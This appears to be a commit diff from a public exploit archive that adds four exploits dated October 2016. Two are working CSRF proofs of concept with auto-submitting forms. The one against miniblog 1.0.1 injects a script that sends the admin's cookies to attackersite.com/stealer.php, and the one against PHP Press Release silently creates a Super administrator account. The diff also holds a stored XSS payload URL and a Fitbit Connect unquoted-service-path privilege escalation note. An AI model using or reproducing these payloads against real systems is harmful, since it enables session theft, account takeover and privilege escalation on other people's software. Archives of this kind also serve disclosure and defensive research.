DB: 2016-10-10
4 new exploits miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post) Fitbit Connect Service - Unquoted Service Path Privilege Escalation PHP Press Release - Cross-Site Request Forgery (Add Admin) PHP Press Release - Stored Cross Site Scripting
This commit is contained in:
Offensive Security
parent
cda049fa54
commit
8ea4614148
5 changed files with 128 additions and 0 deletions
|
|
@ -36597,3 +36597,7 @@ id,file,description,date,author,platform,type,port
|
|||
40479,platforms/php/webapps/40479.txt,"Entrepreneur Job Portal Script - SQL Injection",2016-10-07,OoN_Boy,php,webapps,0
|
||||
40477,platforms/windows/local/40477.txt,"BlueStacks 2.5.55 - Unquoted Service Path Privilege Escalation",2016-10-07,Th3GundY,windows,local,0
|
||||
40478,platforms/windows/local/40478.txt,"Waves Audio Service - Unquoted Service Path Privilege Escalation",2016-10-07,"Ross Marks",windows,local,0
|
||||
40480,platforms/php/webapps/40480.txt,"miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)",2016-10-09,Besim,php,webapps,0
|
||||
40482,platforms/windows/local/40482.txt,"Fitbit Connect Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
|
||||
40486,platforms/php/webapps/40486.txt,"PHP Press Release - Cross-Site Request Forgery (Add Admin)",2016-10-09,Besim,php,webapps,0
|
||||
40487,platforms/php/webapps/40487.txt,"PHP Press Release - Stored Cross Site Scripting",2016-10-09,Besim,php,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
38
platforms/php/webapps/40480.txt
Executable file
38
platforms/php/webapps/40480.txt
Executable file
|
|
@ -0,0 +1,38 @@
|
|||
# Exploit Title : miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post)
|
||||
# Author : Besim
|
||||
# Google Dork :
|
||||
# Date : 09/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://www.spyka.net/scripts/php/miniblog
|
||||
# Software link :
|
||||
http://dl.spyka.co.uk/scripts/php/miniblog-1-0-1.zip
|
||||
|
||||
|
||||
Description (admin login required) :
|
||||
|
||||
miniblog 1.0.1 versions is vulnerable to CSRF attack, adding, delete and
|
||||
edit article in the sections
|
||||
|
||||
Vulnerable page : http://localhost:8081/miniblog/*adm/admin.php?mode=add
|
||||
|
||||
Dangerous point : if used with XSS can be steal on the admin's cookie information.
|
||||
|
||||
|
||||
*############### CSRF PoC ###############*
|
||||
|
||||
|
||||
<html> <!-- CSRF PoC --> <body> <form action="
|
||||
http://localhost:8081/miniblog/adm/admin.php?mode=add&id=%3Cbr%20/%3E%3Cb%3ENotice%3C/b%3E:%20%20Undefined%20variable:%20post%20in%20%3Cb%3EC:\xampp\htdocs\miniblog\adm\edit.php%3C/b%3E%20on%20line%20%3Cb%3E8%3C/b%3E%3Cbr%20/%3E"
|
||||
method="POST"> <input type="hidden" name="data[post_title]"
|
||||
value="<script>location.href = ‘http://www.attackersite.com/stealer.php?cookie=’+document.cookie;</script>"
|
||||
/> <input type="hidden" name="data[post_content]"
|
||||
value="tester" /> <input type="hidden" name="data[published]"
|
||||
value="1" /> <input type="hidden" name="miniblog_PostBack" value="Add"
|
||||
/> <input type="submit" value="Submit request" /> </form> <script>
|
||||
document.forms[0].submit(); </script> </body> </html>
|
||||
|
||||
|
||||
|
||||
########################################
|
||||
|
||||
35
platforms/php/webapps/40486.txt
Executable file
35
platforms/php/webapps/40486.txt
Executable file
|
|
@ -0,0 +1,35 @@
|
|||
# Exploit Title : PHP Press Release - Cross-Site Request Forgery (Add Admin - Super User )
|
||||
# Author : Besim
|
||||
# Google Dork : -
|
||||
# Date : 09/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
|
||||
Software link :
|
||||
http://www.pagereactions.com/downloads/phppressrelease.zip
|
||||
|
||||
|
||||
|
||||
########################### CSRF PoC ###############################
|
||||
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC -->
|
||||
<body>
|
||||
<form action="http://sitename/phppressrelease/administration.php" method="POST">
|
||||
<input type="hidden" name="pageaction" value="saveuser" />
|
||||
<input type="hidden" name="subaction" value="submit" />
|
||||
<input type="hidden" name="username" value="murat" />
|
||||
<input type="hidden" name="password" value="murat" />
|
||||
<input type="hidden" name="userfullname" value="murat tester" />
|
||||
<input type="hidden" name="accesslevel" value="Super" />
|
||||
<input type="hidden" name="userstatus" value="active" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
<script>
|
||||
*document.forms[0].submit();*
|
||||
</script>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
####################################################################
|
||||
22
platforms/php/webapps/40487.txt
Executable file
22
platforms/php/webapps/40487.txt
Executable file
|
|
@ -0,0 +1,22 @@
|
|||
# Exploit Title : PHP Press Release* - Stored Cross Site
|
||||
Scripting*
|
||||
# Author : Besim
|
||||
# Google Dork : -
|
||||
# Date : 09/10/2016
|
||||
# Type : webapps
|
||||
# Platform : PHP
|
||||
# Vendor Homepage : http://www.pagereactions.com/product.php?pku=1
|
||||
# Software link :
|
||||
http://www.pagereactions.com/downloads/phppressrelease.zip
|
||||
|
||||
|
||||
Description :
|
||||
|
||||
Vulnerable link :
|
||||
http://site_name/phppressrelease/administration.php?pageaction=newrelease
|
||||
|
||||
Stored XSS Payload :
|
||||
|
||||
http://www.site_name/phppressrelease/administration.php?pageaction=saverelease&subaction=submit&dateday=&datemonthnewedit=&dateyearnewedit=&title=<script>alert('Exploit-DB')<%2Fscript>&summary=deneme&releasebody=deneme&categorynewedit=1&publish=active
|
||||
|
||||
|
||||
29
platforms/windows/local/40482.txt
Executable file
29
platforms/windows/local/40482.txt
Executable file
|
|
@ -0,0 +1,29 @@
|
|||
Fitbit Connect Service: https://www.fitbit.com/
|
||||
By Ross Marks: http://www.rossmarks.co.uk
|
||||
Exploit-db: https://www.exploit-db.com/author/?a=8724
|
||||
Category: Local
|
||||
Tested on: Windows 10 x86/x64
|
||||
|
||||
1) Unquoted Service Path Privilege Escalation
|
||||
|
||||
Fitbit connect installs as a service with an unquoted service path running with SYSTEM privileges.
|
||||
This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.
|
||||
|
||||
A successful attempt would require the local attacker must insert an executable file in the path of the service.
|
||||
Upon service restart or system reboot, the malicious code will be run with elevated privileges.
|
||||
|
||||
PoC:
|
||||
|
||||
C:\>sc qc "Fitbit Connect"
|
||||
[SC] QueryServiceConfig SUCCESS
|
||||
|
||||
SERVICE_NAME: Fitbit Connect
|
||||
TYPE : 10 WIN32_OWN_PROCESS
|
||||
START_TYPE : 2 AUTO_START
|
||||
ERROR_CONTROL : 1 NORMAL
|
||||
BINARY_PATH_NAME : C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
|
||||
LOAD_ORDER_GROUP :
|
||||
TAG : 0
|
||||
DISPLAY_NAME : Fitbit Connect Service
|
||||
DEPENDENCIES :
|
||||
SERVICE_START_NAME : NT AUTHORITY\NetworkService
|
||||
Loading…
Add table
Reference in a new issue